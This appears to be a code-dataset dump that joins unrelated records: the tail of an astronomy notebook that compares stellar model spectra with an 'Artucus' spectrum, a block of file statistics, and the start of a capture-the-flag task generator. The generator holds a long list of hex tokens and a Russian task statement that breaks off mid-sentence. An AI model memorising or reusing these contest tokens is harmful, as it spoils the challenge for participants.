w_settl, f_settl, bb_settl = load_Allard_Phoenix("data/lte043.0-2.5-0.0a+0.0.BT-Settl.spec.7")
settl_spec = Spectrum(xaxis=vac2air(w_settl*10)/10, flux=f_settl)
w_dusty_spec, f_dusty_spec, bb_dusty_spec = load_Allard_Phoenix("data/lte043-2.5-0.0.BT-Dusty.spec.7")
dusty_spec = Spectrum(xaxis=vac2air(w_dusty_spec*10)/10, flux=f_dusty_spec)
w_next, f_next, bb_next = load_Allard_Phoenix("data/lte043-2.5-0.0a+0.0.BT-NextGen.7")
next_spec = Spectrum(xaxis=vac2air(w_next*10)/10, flux=f_next)
w_cond, f_cond, bb_cond = load_Allard_Phoenix("data/lte043-2.5-0.0a+0.0.BT-Cond.7")
cond_spec = Spectrum(xaxis=vac2air(w_cond*10)/10, flux=f_cond)
w_aces, f_aces = load_phoenix_aces("data/lte04300-1.50-0.0.PHOENIX-ACES-AGSS-COND-2011-HiRes.fits")
aces_spec = Spectrum(xaxis=vac2air(w_aces*10)/10, flux=f_aces)
# In[19]:
#limits = [2100, 2200]
limits = [artucus_2.xaxis[0]-2, artucus_2.xaxis[-1]+2]
print(limits)
next_spec.wav_select(*limits)
next_spec = next_spec.normalize("exponential")
dusty_spec.wav_select(*limits)
dusty_spec = dusty_spec.normalize("exponential")
settl_spec.wav_select(*limits)
settl_spec = settl_spec.normalize("exponential")
cond_spec.wav_select(*limits)
cond_spec = cond_spec.normalize("exponential")
aces_spec.wav_select(*limits)
aces_spec = aces_spec.normalize("exponential")
# In[20]:
artucus_2 = align2model(artucus_2, aces_spec)
# In[21]:
plt.figure(figsize=(15, 10))
artucus_2.plot(label="Artucus")
dusty_spec.plot(label="BT-DUSTY")
settl_spec.plot(label="BT-SETTL")
cond_spec.plot(label="BT-COND")
aces_spec.plot(linestyle="--", label="PHOENIX ACES")
next_spec.plot(linestyle=":", label="NEXTGEN")
#plt.plot(w_dusty_fits, f_dusty_fits/max(f_dusty_fits), label="Dusty fits")
plt.title("Artucus - 4300K")
plt.xlabel("Wavelength(nm)")
plt.ylabel("Flux")
plt.legend()
plt.show()
# In[22]:
plt.figure(figsize=(15, 10))
artucus_2.plot(label="Artucus")
dusty_spec.plot(label="BT-DUSTY")
settl_spec.plot(label="BT-SETTL")
cond_spec.plot(label="BT-COND")
aces_spec.plot(linestyle="--", label="PHOENIX ACES")
next_spec.plot(linestyle=":", label="NEXTGEN")
plt.title("Artucus - 4300K")
plt.xlabel("Wavelength(nm)")
plt.ylabel("Flux")
plt.xlim([2139, 2141])
plt.legend()
plt.show()
# In[23]:
plt.figure(figsize=(15, 10))
artucus_2.plot(label="Artucus")
dusty_spec.plot(label="BT-DUSTY")
settl_spec.plot(label="BT-SETTL")
cond_spec.plot(label="BT-COND")
aces_spec.plot(linestyle="--", label="PHOENIX ACES")
next_spec.plot(linestyle=":", label="NEXTGEN")
#plt.plot(w_dusty_fits, f_dusty_fits/max(f_dusty_fits), label="Dusty fits")
plt.title("Artucus - 4300K")
plt.xlabel("Wavelength(nm)")
plt.ylabel("Flux")
plt.xlim([2142, 2144])
plt.legend()
plt.show()
# In[24]:
# Adjust resolution to R=100000
R = 100000
from convolve_spectrum import convolve_spectrum
old_spec = aces_spec.copy()
next_spec = convolve_spectrum(next_spec, chip_limits=[next_spec.xaxis[0], next_spec.xaxis[-1]], R=R, plot=False)
dusty_spec = convolve_spectrum(dusty_spec, chip_limits=[dusty_spec.xaxis[0], dusty_spec.xaxis[-1]], R=R, plot=False)
settl_spec = convolve_spectrum(settl_spec, chip_limits=[settl_spec.xaxis[0], settl_spec.xaxis[-1]], R=R, plot=False)
cond_spec = convolve_spectrum(cond_spec, chip_limits=[cond_spec.xaxis[0], cond_spec.xaxis[-1]], R=R, plot=False)
aces_spec = convolve_spectrum(aces_spec, chip_limits=[aces_spec.xaxis[0], aces_spec.xaxis[-1]], R=R, plot=False)
assert aces_spec != old_spec
# In[25]:
plt.figure(figsize=(15, 10))
artucus_2.plot(label="Artucus")
dusty_spec.plot(label="BT-DUSTY")
settl_spec.plot(label="BT-SETTL")
cond_spec.plot(label="BT-COND")
aces_spec.plot(linestyle="--", label="PHOENIX ACES")
next_spec.plot(linestyle=":", label="NEXTGEN")
#plt.plot(w_dusty_fits, f_dusty_fits/max(f_dusty_fits), label="Dusty fits")
plt.title("Artucus - 4300K")
plt.xlabel("Wavelength(nm)")
plt.ylabel("Flux")
plt.xlim([2142, 2144])
plt.legend()
plt.show()
| 26.463178
| 156
| 0.734163
| 2,294
| 13,655
| 4.191369
| 0.100262
| 0.05741
| 0.040562
| 0.046802
| 0.85429
| 0.828601
| 0.816745
| 0.795216
| 0.788352
| 0.766927
| 0
| 0.053959
| 0.085244
| 13,655
| 515
| 157
| 26.514563
| 0.715795
| 0.112267
| 0
| 0.820261
| 0
| 0.042484
| 0.193102
| 0.060443
| 0
| 0
| 0
| 0
| 0.006536
| 1
| 0.003268
| false
| 0
| 0.042484
| 0
| 0.04902
| 0.013072
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
46b3990d5d1c687694b854c35ba1ecf4650740c2
| 19,352
|
py
|
Python
|
tasks-deploy/oil/generate.py
|
chankruze/qctf-school-2018
|
1e732cf264ee0a94bc2fc1fd8cf3a20660d57605
|
[
"MIT"
] | null | null | null |
tasks-deploy/oil/generate.py
|
chankruze/qctf-school-2018
|
1e732cf264ee0a94bc2fc1fd8cf3a20660d57605
|
[
"MIT"
] | null | null | null |
tasks-deploy/oil/generate.py
|
chankruze/qctf-school-2018
|
1e732cf264ee0a94bc2fc1fd8cf3a20660d57605
|
[
"MIT"
] | null | null | null |
tokens = ['35a408771319c6bb7f9832cd4c633d1a', '9038a7c7afad7e1a118ab6ceebd727de', '72e1ffd020ff72fe63a72191513d826c', 'fae39128db475e6b764c63681dffd80c', '2bcee2876e30b4907279c8b4164f91d6', '9db5efcb843bf05b5811268157b92697', '78504d25cbac7fabd1bfd303aeb65346', '4dbc99a6d49715e34a0fca1a000b58f1', 'c7dbe1be63fbf3fe065253951a232808', '21edb202b1db5b652262dc25952f2195', 'de8e9356b230cb9b9f937827dd3130f8', 'c4dbc181eae3536dbfa11a7169c2652c', 'd23f1a6aaa85eba322171869043033fe', '4e11d26b790a28c71dd16f9451fc6cf6', 'd4aa1fd5227f44b257176b0ebc93a41c', '4015c8ae57928938487c57860e89d7de', 'ed56a2fc2b98fa4c4d2a5015f32f8547', '4ba160981bfe7541580c80198edbb25e', 'a65a979bbd18609e1864348d7990b128', '7c4e588fedce832460a08ab59aa3a72f', 'c92ad1f9b302afe676fbb56969121901', '31e14d0450d6d9ac3234f8df5f0aee39', '61e99810ea9f10ee1e0b14a3bc209db1', 'e2c3b870f67ddbe001cad17e21d6dfa6', 'bfb725e66b37f34e6980fcbca4b2422e', '738cda579244e8aaad3457e30f3c2992', 'f9a3cce294d8d8daac75b72c23fa9719', '69f8dbcc9d39df54102d76d304173108', '85f1d72e638464f69f95460b47f90e71', '6094ac55ba08419d6af8f2417d15f74a', 'ccb21a90d8b6b8ba3b9f7dc1538692fb', '6a1044a94d2c4f9ee94d40374b29d1ab', 'd7c16689b24e0fd54634d9b06714e340', 'fbb0d6e0dc975092f319a5e2247cf981', 'a04405285a7f9eb4062f3aef567ff87a', '423215e93ffd89136b2fee919c188d3b', 'd7ecc1e6081a7f0edd34b5ea4843dd3d', 'a53e89ce6d32d9ea4397ca3362efc506', 'e4350ab0edb122b1c686c64383a8d2e0', 'cb1df0b70cd70511855553c64aaa3053', '0c87644b42680ed45db571c18b0332a1', 'c81b1d0a34d692c4135dbf0c02dc8375', 'f82f95956d5a22f7496eb3b5b8164d18', '0268e4a16215074eaad0f99c38553749', '37d4d52896a0007e05c7038df1fdf0e6', '53c5cc29342c155af07cd4195eea7beb', 'cf6c42026a9bbfcbfd4b8e57ee1ac4d8', '0d4ca29c4ceec6e6be5b1cb163151d0d', '48e94b249a4e19f65ee7879393632287', 'e7c2b6818a8aea98d538dec383334543', '2792d676b5b9d1ea2152d46ad0175652', 'a415372b7322134a072a2441f993c069', '81d201e15c10b14e972f4b614a32e3d7', '30f6de0dddac5f3a1a39e8d5f4d23410', '1b5685ce998b5f55210d0f66986c8c00', 'fca89d9e624d55a697d7ec51e2187944', '13aee1cf0fc3e0cc7c36c8e445baae1f', '4bacd730c6a05e1391c0c836aa582b14', 'd8510a11829be69577295a1e2dda8294', '48fc507ec8f849e273e6f71ac9cfe79b', '4288acd1dd6eb8a4b88336b1e4724a2a', 'c9c50c13b991138151cc52edd59f9c2f', 'e0b73e0d71c1ac1ea355cee0e667b31c', '1bc2f2a01ccace031237c6418293a447', '8b69e063eb6fba0ae1f62033c4d31e7e', '14fa5319ffaaee8b52d33eeb9d7cd5cc', '3981f953a50dc222886e2660918c228e', 'f81622f7fac9be649d8db7ca45eb0481', 'a464c2cf5f8c1acb13497e057e2ac27e', 'f6a8561aa655a5ff15655918fd108c92', 'a3167482e6c6dc0e330b3769c65b3e51', 'fb847455599f82911e62a79b720a8b4c', '45ebf7c64fa3577183febe53a0f0c539', '66f1eca8c32397e4adfdfd23bee4444c', '45fd0f67400bc7d00d078baa7f601bca', '826e149a92f7e45d7f5fe1d242ae508f', '78f897ddaad2aa7b985e9075db3ae8b0', '8518d5fbeffd8fdac2fc435eef6ffc27', '9684306ec11607f3714c8ebff70443d8', '1b329b13b38e9328787b27d28557bd1c', '84a74197dbf8c7616d46b2d8fdc70a01', '54360ed0c9d112e1eac10e03e02c56e3', '5becee4c7199a45fb6bddc07b0306bc3', 'd83948bfde4f6a3d093018c17cb45ca1', '163d9938dc76452368ecc60eab72af6a', 'de78340b49ee3dfa911f99eb985fb9d4', 'efe3b2719b43c8aba4f69f75d462ac8d', '669ff582f242c42ebf5d0ec5b1b707d3', '9628b7078c3c8254c3310e176e9b286a', 'bd8897ed0b64b82ce1e8ca404f23d1b2', '122702a57b817c106a4254e4f1b49614', '8e492211a6dfa7736d60d62f40ccd296', '122ec1e3319957e9c5757b2a7b9f04b4', '0dd9551bc9e5eb05ad0024116eb2f178', '56155a50c11f3b0c51df8c5d0944510a', '04e47aefa5f0b26bf334cbec940854c0', 'ba4232e6d4a5bc4541dfc005df1e8e16', '6482cefec7b48edeede4ca4d7187841b', '6464e9b41846c67682729151c70c694e', '31413380f5b90f5e37fdbbb81d635139', '44c216c536368a78f39ba13113781aa2', '76cc21bb8d267e8db94efd420e8aa0e9', '684106fd5bea15ff6428c92956b949ff', 'a770555ade594484cfe8c9e2ec7c88fb', '86d649d271a28b987909ad5839d59573', '86c9c6fc2978bf8a04389dc8a4ed122e', '1ec19cbc162e00dc332595e497a881a9', '45fc67f33e5748d05476940c6c6bc7c4', '6fc3af3cc635e538f75ab09dd9339a48', 'fc10e83d0d6ce4e6b6fe6e4406d63b53', 'ac2b9e67a9331f7f9cece30c056fddfa', '74d62a41d218e3d68a4830ec331fe4f2', 'bb5f8cc50ee4b01d064ca3f744b6fef3', '6e5da614760cfbd19911e63184991d6e', '4abb7b9e213084d2779f28028182614a', '6a1f668bad08e1afc52f69f4c65110aa', 'daeb01091292dfdfad1438657c7f6ff5', 'a44ea540ecca868cecefbac0877860e1', '4e4003375c00f54e6a6fac8b3edaefdf', '5b2742f8cc02b7f11dada94513aa1739', '0a3a3f4f96a0ab452796a2c9005408f3', 'f5887acdd0a99b73ef1060d02ba00b18', 'f2c71e88f340368eadf869d907a29eb9', '6d879ced527b8730ef54e029d4d52c35', 'd201cfd8d59764a9fec9baef192b81e3', '9389c3ed157c38c9cc444cca4d65a090', 'aaa5eb610e20efa8bbb6472a5ade35e5', '50ff4919d965977c4bfa18bca079ec19', '4a7becb9e67567b7f436d26646b75511', 'c1b4554df66ded827c6d4c3b0314aec1', '268d40e27b019ec3c7616d1aca8ea904', '5a69f009902d021ebe6b9c144629ef50', '6388bd2f1ae7c3ca1b75d1b6650739cf', 'ba1435c8eee5a653bfb4ceb6abc4c0a5', '6f88bfe72dc9b1087ebfdbe4d22b71b6', '864ef40970e416a6d16caf5104b39d6a', 'e3c499ee4cd98a500e408266abfeb4f2', '258773d3830a83f125820fa95a63e0b9', '4e92f845990b9196a4b45649b8ccb553', 'c3f5d0193ee5a9d07e504252d59201b0', '7142dee82df1537ae713ec8e35cceda8', 'f0fb7d7270dd5358bdad4bf1dd9635d6', '5bfa20bb6cbadc4a04827ff7a604a8ce', '65aecd170403a07367d48dcc6980afd7', 'ecf0e55d5708bfa817a56698b8110b39', 'c0a09cdae4c47a78db2c336934ba7e68', 'bdab048a60cf7359501684f9499f44ce', '258bb02e7f3d0a90fc76a0ef92e05e8c', '776470672a42684924343cd8b206eba5', 'bbf91d646231bf714d629883750d20e0', 'bb1baaf364be0f598aa9c0133176451b', 'c951701d6f5504a645e28c2e6ff1480a', 'ebe31aa9da13229318115044f3e468ca', 'a49536a0b30242affc316bb87a0272b8', 'f220c2caacfa415780916e97c9ca6908', '8eb489a1753bdc6cfb545cacd035bfe7', '7b7ffa3f7fa83128d6026fd15f134b85', '0ce4da3e71c6b7cc0a5637948aa0f48e', 'e429f0e53d4047c5f4defa094d183c8b', '17bb2a3de16819115f326fc1a9c126b6', '31c2029a630afa6656c73326e044b099', '044ed8160bf6723104a606a98823ae41', '875b55c8acae55e3db7195935aec6ff7', 'a594c6df9d5daf37625ec90936e1fb00', '958c8bd2792649ece8c2f837b323fca2', 'f797ec9d880655b378bbb6dc44ae9c53', '21a7449654fada0238d68bf9c419954d', 'a297720aeb7d373f545f6380d6c27909', '915ed23eae74fc6cd2b4719f7c5d21f0', '8dfe9f285dad3c94bc0fc517f3680269', 'cb65d63303f04fb1a3c4e53b58947ec4', '5e93f5f338e7ac9f04adad6b94bfe7cd', '69b897d71d59345da297ebaa13ca55a0', 'fb53b9c04f8b32189fc1eef2cd09a773', '365274e17d39f68bad1cdce48970d7f7', '01533df28f9d69687023191d84ff8f4a', '71876f98391899b01b34f8e7eb0df2be', 'dea69889d655b18cb5e6cdcb4ba71e58', 'da70221af35a381282e6e04b2a4963a1', '0e502488efa70c14584947251e78fe4a', '58ec4bbc7546e204c00d731f1aeaf54c', 'da3382fd176eb9dc83ed1b0b2e40fe23', '61b5bc45fbf56943829c7972fb30d71c', 'f73099ae6167c961b0c4130b1c825040', '846ead08d3bb312a69256e070f22d772', 'b2355eb179396a4d1943a3a4763ebd82', '4e532e031391740efc3f7ce178154b98', '9ec9d777505074839e43383f6daae6e5', '3928692e776ad3e640e543a15d33847d', '3f2879459b124350f844fc19a19246e1', '51e0f10f5cf3cf237724aa10137128d8', '4c6161babd7acd9bf6f194e30cf680c8', 'c6ac613dd5c8d6c803b32c42b951d81e', 'd5cf0ffd3eb457cc93b8502f46bbcaf9', '44bb407fa06c00f9e12c17168ac638f1', '09989176460ffc43b523da90b574f1fe', '6bc542e7eeab785410283cd4cf10d4cf', 'e91dec93184db42e88c83c857de95b22', '34639b479ac9889ce3b239194df17ca0', 'b2ce4c43c37748aa6110ad7fd239c859', 'c9ab512f602a171a2cff50daeb9bad81', '50debb18d08ea9a2fa8f424e5d9911f2', '9c0ff5a9ee35f05ae73e3fbcc9c24253', 'cb02c82400cb8f7bee7e8e2341732d47', '26e9a59a8a6232c560e9daaba5417cc4', 'a549c1482a8064c4664e36b1e3c3dbea', '64ae5e0626186c693f6e696ca5d7c2f4', '4f2b168dabfff44a9d4c9855e7a7e13e', '94f54944f1b8e9368b35c0f0a4058835', '159a8b7a5b90742fd0147b86895cf17a', 'c55f32a21ca390ddc7c7b72cc3cafff3', 'fa2366327fdaf077d42a01d2952dc561', '5c6e736654604d3a9eb66d63b33c02da', '74941d0e802085150c3a0da698dfb115', 'a8c36c765dda3f2a1ecb2984076b00d9', 'fb970b94f104c403e1565e5a3212af3c', 'a83ec3e5403d2c86b0f732ab939f4a72', '5405d151f2b0025dbb580546d65bdbd0', '03f53034ce6872432bbb49b7ba955acf', '96ed927408586898a68d2eb1ac19715d', '78b9b4455a47c522bbb201146029b515', '544d810455faf5f3aca28c55d1d32d09', '9326819719836bf8d57eec319f5da9cf', 'e27322003a6ed3f02539bae800f21c89', 'fa9922e6eac3c9791ccbfa36d7d59fd8', 'aa4bbd27e10fe9e059a7dbaedfedf9c0', '74476c341c1fe62b655840fc66468398', 'bc014de29856a721b80bebc2079edf01', '8b3a39284e305f7186279060847cf92a', 'aa73892e1ac243a21a49dc82b07bde96', '94766fd201cb77282766f1add45ebec8', '17f88633faa0f3082ceaffda96236355', 'c6203be41d862b0100137d15b927eeff', '6c55b48f06a287fd06f26f6a4abf0df6', '3ba309b87598510a1d4715f07d7a8b9b', '250e0128810ec7d51901f8ec5a4d5af5', 'b7487dce771d9ef30b9632d68de1afc5', 'ff4e491dee859982dc74899b2907e8aa', '808c7a81735ce09bcc060a90300ebd14', '03b0731e808d92ce62aa1c0e95d01830', '832dff4b1518f3d6fc796e660827147d', 'bab3f6aabaf6a1967834368f88aee4d6', 'ffabb38905f1fb6cacf25a75db242ed5', '0a5080f2f98361a1638f092d76c31565', 'd861283dd35c855a6ff4d6ab0f0e0a61', 'b0ddfe7672ce4c58170b0a7f5c7b88ec', 'f067d6666f288be9076c2cfa0fc4542a', '31b65c888ea77fbbd200c518041150ab', '696f93f2ee3f1f010b18b33e2aa66237', '3c4dd6eedad966f6a8e0f5f460938dba', 'c68c077ab41ff39112f14ead937fd532', '2f13331ed5a06244005339b5bd855446', 'b1d2766f7914aadead949d1e620c78b2', '9b9d84c8c8df825c6f64501d1dfdb3ff', '2fd19fde2de73b8df9717c0ccc5b7c89', 'f647d786987c80ed033cd886e5039f3a', '2864180b56a82b04acf8cc36302790d2', '3f40180870a1a137f55fa99c86ec2da4', 'd4e0c4a49ba763a9c859f6c0b8115a5a', 'b5b25bc5911090da9f8148ad5aa96bd2', 'b12eb2cdd6eee70fd52041261d2a8a08', '297e9fac9d47ffb39be37209e7e65d58', '086be6291d4b35db93abf429cfd31a43', 'fa676ae581e5cd670fef56a418314159', 'f7e7670d68201be307db4a37f5f4cc1e', 'b717da981091840a0ef406f70d9a11bf', '2834284dd065d683bce326183e54dcde', '94f5a82ef70428e28ee7e653bd8e9941', '0a20e7820626eee921ffbafa337adc3b', 'c4219157880322adc31ceed984ae43ce', '54b43e833b37da0aa31343277dbc3ff1', 'aa2df0c2734542401199f84fd7c42f06', 'f5ae4b1379d92c4c4041d306a8381614', 'fe3cefe5a25d95f8737ecbe780b5c6d5', '75f45f279dbb4ff604eae12ae489286a', '7cc45e621d57f22be42827c223564c4a', '43ae14df6ea243839dc8f71571cc66fe', '983de3a79c050183a68c948b496f0cea', '0195899b2ff64a230e7ad663d562cd0a', 'bc5c2cf1ef9390dc709530c12020fbc5', 'a81918d29975f96c6b180638d8f6b6a7', '6a80fcbc454710867c95264b52c8a13b', 'b7e5dddefcacf816ca7e7776edb62b56', '4cafdbf77a4fe75c08be17ce85f0984b', '2831f75125dd024eed90b5ce7727e849', '84c3a26a2d4c9c6ce7f178a4d58a844b', '89e89e943f432244cd8b3cbe70ec43b9', '506ea00d1bc37e7dfd0796f0a21d5b12', 'c8b5b7924097568bf5e1cf688d505efa', '17f5452d0decd8e9453a62cf82886754', 'd80807d986b784fad217f96b064d961a', '938a3e72ebcee1d3b0a0f6d6d3f65177', 'cc4069c76123625e747554a71dec8564', '82cc4100dc1680115ec6e1c68c0cebe3', '73ca8814c796b54fc5428bb14fe3eb9c', '4ca996937b17ea7c2da81481975c28ed', '6eeaa54ee22c234ac467c16459c18229', '4649abdf27b437cfa8117a92af0d6cda', '0d6e2cb506fc16e0185bda39ca2fd0a4', '46c50b5c04612cab561320eefb3e65f5', '1f41ab6dd4dd86f4b4d76b870e3a63b8', '5f616cb55a1ef53f6af1182613e83cb7', '1b0d949ede2301e9c03594392de4ab4d', '6a947aa4623f5ecfecb7c5e44bac1135', 'e98c203935b8f1e9120efc2d09e23d6b', '7d2fe596d102a7231a6a9dfd503bc50e', '75a7854f7c5c7291ffc99153bbccdebe', '61d746eae4aa56e208603727be60ce12', '08b9a0ce9da4d1bcfc1a3797ed745288', 'ab2aff565cde8dc9a5ddcc23cbdcb889', '17bc67bd15382aae234e0efe1c8314a0', 'ec77f870d03437910c5bca4a6e25f97b', '99e66b2ef5f8d22fc08f47802380ae0f', '9c8f1a1b4c6bcf722b2f710e3f64aefa', '30230e202b482a6cd65bd2321e2b0307', 'e859e0b46727b24d89637c36d3277d42', '51cb437b9ef2d66134914ef6686a6363', '9e384249cec420478ae896da3014f6d3', 'e7010a6a398b42500dc81319fb0751fe', '9cc980af98507087a034f6a14a2798e5', '7e0c54cf6a21ac914e7cf3452273d1be', '23ac1f09f96dcd5af9c07b3c0b7f5121', 'e6001db10ed6410e5c3f06b729ae410d', 'd5f0e63e4760ceeed9fa15e949a1269c', '2ae89f3ae167fed66b257f6bc1f80883', 'f54ac531976447b978bc704387e9a845', '53c52aaa9315ae28798cdd5c02f52964', 'a2e99c22ee7001c270e7a06cbceeab30', 'ab2b7c8d76c7f979112810ff9782db06', '5e7fb4a83ea75f134a276f75ee20042f', 'e17ed752217a70f56d8280d0ee02d69d', '370a294eff91b2ea743c0f51c1f88aeb', '04ba9ea135b7ecf747c39035cdc3ba46', '1c25d1026c3361f3b29e327eeb7d61fb', '0ae6b72521f178394d077594f513775b', '95a7735e53de56d599b9e7279e1a577f', 'edaa16de18ae33433aa7e09bdace31b4', 'f6940035b5e087142425130f70dadfb2', 'aa702881a78b6e41398a2af83ed71ff6', '3638dc0ad1f75033f11c19952207ef8e', '8cd8b978cd03eca21f9a1d89cd1e9308', 'db40a4b6db72e464abb156fa4305d197', '7f210ad6b42c3fdf8a1629179398a5c1', 'efeb95f4b9bd88e224e3ad105437dc73', '5d0ce325869174dba91bfafd4f593bf9', '9ae56f89101225770184020773a4747e', '3582889c23537f8532d724ed62ebc136', 'd3660dea229e631eb7055f51d45523b3', '3fb001ebc9ed74357b1de05105f1c756', 'f0947fbdbe653e37e97b562c4845cf8c', 'ea529841a0b3a1775b06dacb64f68f06', 'e3c0b41df4977ca263b840914d4d5be5', '53c2ace67283e328aba03fbde32ff8ba', 'c9e912de394227acf77d88ea767decc8', 'cf0aa58106be6ccde4b34e074d1c606d', 'f9b47c241e1d80b4cedfa5c92439c775', '36b1eb93500904edda2d6a7d61892f34', '141352930793c38ad0f9dc2921ab0866', '81e3e80b0c426b7d992f648f4d31548c', '9f953e4db28fdaeb7b70d2d291028dca', '799c00773136ce6ec7c87b6fe80e07e6', '27e062316ea549a504de9fa62d0a0169', 'a127c99e725b96eeba0cfe351b3f98b7', 'ed5144e122bc1e57f6286165eb8aaebe', 'bd10330da2d1d5d229c7d851c0de3905', '7bd475b8df562625f1836356735ea6f7', '070d05d3c4cbdf65a6ca0726c043ddbf', '4ad9f5ed26c454d772872023f538eae4', '09678b3317d87b382e3cb3a6e6677863', '0cf703d93f72a4d21aaff9485aed15e2', 'd564363e6bdc23ac2d801814a805ee2d', '3257b3ef3bb4808d08a3d43888827652', 'd3d4c49dd108c1c8d4039d1516a40e56', '2cc38aa75f40560926bc9b2dd954e67a', '76c3bf7d3f4fade32a96133fb40b00c0', 'c25c43cc3e7338eddadd77d1d93abaea', 'ce274bddeba84ee78a9defa881261f14', 'ab18cc1be87793fdadcf2e633129d618', '694d83d7e6f7950f2fe9395660b14355', 'e2c00ab9e54a801b9b29c3b53a73b334', '804a3fe03d29c728c44a406e6d89b83a', '3dea7f666398f30b78e9c6f3b93a3943', '880db93668839e95744afd8d7516e51d', '27cce8a0dc57a2cf1707b7dbe51ba7f6', 'c4ae4e4eb421d3bd48f81c095285d297', '9668a4f5eaf7b734ffb09c69b36be469', 'ebffcd8b34cc5d0936d0f5cbad6ba1e5', 'ae539cea0a9002557e2c4882c1dd3c12', 'f27117b8b79627e9181a624329db19fc', '372cc5f1c948cd348739ee7cbdc93ddf', '3f8d9ab150c8696f89e9ce4f758ede22', '8e6531df338307914ca34b285067c2d4', 'f16f2439a48530f51d795da1c87e90b0', 'e148f75a898982f501f8cebbe139a556', '625d4d0fe3d64ec6b2602891cfdf7321', 'fdf2c925b7f69b4f93eff9dbff8d8856', '3309476312d3333b0a8ac2f54adb4c7d', 'd8a112dd1e919414ebff02f0903e26f5', '846ef7c0650afa3cb4ee02f3a5649886', '2f78bd12c0e1514942046c1ade55b49b', '85504443aa79fea678e1bce6a39880ef', 'be8806bea6053fb5c9a6a665e8e6ef32', '14a4b500e8cc5a1b419ff3e6a84ee405', '97dfe08a9d10a380de9c33c4cbc3d6b1', 'e407520827040c1b0fdc04978b74e821', 'b624698e681babba1c6f2e4b6cb475a3', 'a39243c32aed493108592a3c30ff8b36', '66a51f76cb00137a6401eead0122b8f6', 'e4f3968c4ecd54425d29e756389d4cf3', '1bad3ba8ed3e8d587a28002f5f21f530', 'eb9125a64c87bd75fe6969cffd720aea', '8ca9596170c14e768b56459c0e2426c8', '71a3acb766e071458e728d2d0b36868e', 'c06e5ad0af4d590a057e9899262ee099', '8c5ab48a73734728196ae9f783d508dd', 'ee4fa87ce36a01e5268f78328bc43023', '510fbe67084400c8c56eb0a3c82664ee', 'a9bd33a453ba6d46196b816c44f3d7f4', '565e4869f313a762aacfb634afabafb1', 'db1e291e8cee993170032da98639a27d', 'ab73ac707781ced0910c74a7b2500be9', 'a6242e892b9df2453983ce1ccde8018f', '0c61ba5657e09d1d46ad1ec736a808d7', 'a90acb5355ee7dba5f34855564a57f72', 'fa6aa1bd20630e5eb142d12094a542a5', '1a6c859f07b3856d51b018a7a58bafc6', 'ae042b639c36615d70ae937e25578e2d', '30613591116d636934d531e45a05dfd7', '51aee96181b3d5dfec6dda308258e6fc', '9ed63572fa558826116fbc0c7b2d0924', '9e2ffe54a58756b3e245b59bdea88624', '0d861c3822a04baad01d3794208b1a7c', '3d8723263683b63633a7db83eaa0e837', 'd898c0606ec704e990021be322d95ff6', '5da9c8f94997720bed036e78c55d708b', 'fda23db0bfa811832783fbd2970a32e2', '68ac7240e1496ada12de9763c256d153', '9e440b393cce91f6b32b3707ccbe96e9', 'b5ef8a29b69f538a24245f3eca992cad', '88cd8eb33200b6a3a5b617ada26b5872', 'a6aab1ed4c62b9e85044f431a36674c4', '440eb23ccf06dbbfb4ddd733db1340b7', '629fa9029cc463d02bc7a4c443d25d2a', '166a55e7e64d548cfd378c79967cb4c2', '98d950ce41e612af650c77cb21b643ba', '61b435432bc6e63ce22d16cbefb0f95c', '3ad2924184c7176ad07ae36bf91df6a4', '56d85f978c275047713536fb4e004d08', 'ca1d6ecc1cb268cec53d9534c2b2a8f4', '58bd1d63663c3e796720e16ac52ab629', 'cae9f2ecb8bac418a86065584b85e5c9', 'b746e38e353f726e72a73582e1f3e162', '17391c9331ba3fa83113ffa46f972027', 'f1c5b54921c836247d3fad0ac82d6d57', 'fa6d299f04401d6f31496b44313418b2', '36d55624a58999d56a71b614353b1f94', 'ce68b0f8d195c17364c2c6b4ee813f7e', 'bd2782ee924797238cc82ceea014c85c', '1ddfb7e59489dd10e09cf852c77d7a7e', 'dc3a32cafe5a01df31f4b741d5e2d35f', 'f39ce9fa962ad59bc5418b8ade41f926', '938e8a1019f0aa43bd4de45881843121', 'd696cf7c3b2b6a87f62f45e18034d1ac', '477268678fc3c0bf71c32e7572234a41', '86ecd6249dffee007242943ed25cc2f0', 'c47be783145d6d8a0cb9e6e8b48b98fd', '6d5c991f86bbc89165efc152ff5d64fc', '2aecbcef4694d08bff759fa16f1db841', 'c8797ae1efe9b89f4b9883c38a83b368', '2dedd00ae63f31b4a9cb81ea5763cbe5', 'bc0045ca6d709441b85068ea060db17f', '5362c6a88ea3f9a850eb55f0dd9048f9', '407ee87e5b2776254bd543f09758c8be', '9bed515d3e6a7126ec78f9c914881799', '970b04491046b144effbeea8b654803b', 'bab6be31310cec55330514670b5359bd', '17ad1260fc56307ac0b5d0d9e085b1c5', 'f6643c7b7c17b13c34a4db4fd95b4df5', 'da57f218a00b8a01d6db83aaefe10c69', '1819e2b1a28f8529dfe24be95df33720', '1e0d798c96ee456e71f0d8be9a8e11d7', 'bb4cc0fc61f3dce0c0e89aa104f878e1', 'c31d1c993afeae70349584bc3dd90dc2', 'e32d98ede07c91698f6e2e489724b7eb', '7fddadfe8c18db9830680b0371422827', '95ead949f5d155b654a6eb891b271f51', '72b1ed98db448c3d204da639267facea', '18909b993a022af8230fded25d3abf11', '1d8753358acf4a88b485920100e1f710', '32cd763d4e4affebc7c9a0f5e42b2b1a', 'bcac46407cd0f1c838cd128c6b1d30f3', 'ef3656509ddba876f61e3a5cd7064e31', 'b1b0599ed4393fad56a3906630a1bc95', 'a2c54d13bedc780548276622a9735cde', '3ff56a4e67f82bae67dae4a045777375', '9109bf9c0b130baf9ff3d1a927a52b3f', 'c1f7dd8d2af14a35c76e4b79504403b4', 'c619a3166acaa2e855108c2f18750cfb', '1cf2455b2e6309712009dfdcd8b04c19', 'e3c1943af1a7c8a7e17cfcc0307e57b7']
TITLE = "Нефть и монстры"
STATEMENT_TEMPLATE = '''
А раньше всё было хорошо. Не было этих безумных монстров, от которых с каждым днём всё труднее скрыться.
В воздухе не витал незаметный запах радиации, а на небе, да-да, на этом самом небе, всегда светило яркое солнце.
Ещё до катастрофы один мой знакомый владел парочкой нефтяных скважин, которые он случайно обнаружил,
когда строил свою ферму. Он жутко обрадовался, конечно, и я бы обрадовался при таком раскладе-то.
Ну так вот, он был уверен, что найдёт ещё скважины, поэтому написал программу, чтобы всегда знать,
